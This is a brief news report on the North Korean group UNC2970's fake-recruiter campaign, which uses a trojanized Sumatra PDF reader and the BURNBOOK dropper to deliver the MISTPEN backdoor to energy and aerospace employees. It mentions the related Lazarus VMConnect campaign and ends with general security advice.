North Korean hackers have been using a new malware called MISTPEN to target employees in the energy and aerospace industries. The group, tracked as UNC2970 by Mandiant, is linked to the Lazarus Group and North Korea’s primary intelligence agency, the Reconnaissance General Bureau. UNC2970 targets victims by posing as recruiters for prominent companies.
They modify legitimate job postings to fit their target profiles, focusing on senior and manager-level employees to gain access to sensitive information. The attackers engage victims over email and WhatsApp to build trust before sending a malicious ZIP archive disguised as a job description. The PDF file in the archive can only be opened with a trojanized version of Sumatra PDF, a legitimate PDF reader application.
This triggers the execution of a malicious DLL file called BURNBOOK, which drops and executes the MISTPEN backdoor after the system reboots. MISTPEN is a trojanized version of a Notepad++ plugin that can download and execute files from a command-and-control server.
North Korean hackers exploit job postings
Mandiant discovered older BURNBOOK and MISTPEN artifacts, indicating that the malware is being iteratively improved to add capabilities and evade detection. The threat actor has enhanced their malware over time by implementing new features and adding a network connectivity check to hinder analysis. In a related VMConnect campaign, the Lazarus Group has been using employment opportunities to infect employers’ devices with malware, mainly targeting the Python development community.
They have duplicated popular open-source Python tools and infected them with malware, and more recently, used coding tests to trick users into installing malware hidden using Base64 encoding. Experts advise employers and developers to exercise caution when handling coding tests and open-source tools, especially those related to Python development. Continuous vigilance and proper cybersecurity measures are essential to prevent such malware attacks from succeeding.
North Korean cyberespionage groups have escalated their attacks, especially following Kim Jong Un’s announcement to modernize the country’s military and industrial assets. Organizations must remain vigilant and enforce robust security measures to protect their assets and information as these threats continue to evolve.